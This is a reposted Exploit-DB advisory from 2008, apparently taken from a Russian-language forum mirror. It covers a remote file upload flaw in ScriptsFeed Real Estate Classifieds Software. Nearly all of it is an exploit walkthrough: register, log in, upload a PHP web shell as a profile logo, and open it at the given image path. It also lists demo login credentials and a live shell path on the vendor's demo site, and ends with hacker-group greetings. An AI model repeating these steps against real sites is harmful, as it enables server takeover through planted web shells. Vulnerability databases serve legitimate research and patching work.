- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7110
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6944 cve-2008-6943 cve-2008-6942
- Дата публикации
- 2008-11-13
Код:
[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------
Exploit:
http://localhost/script/re_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-13]- Источник
- www.exploit-db.com
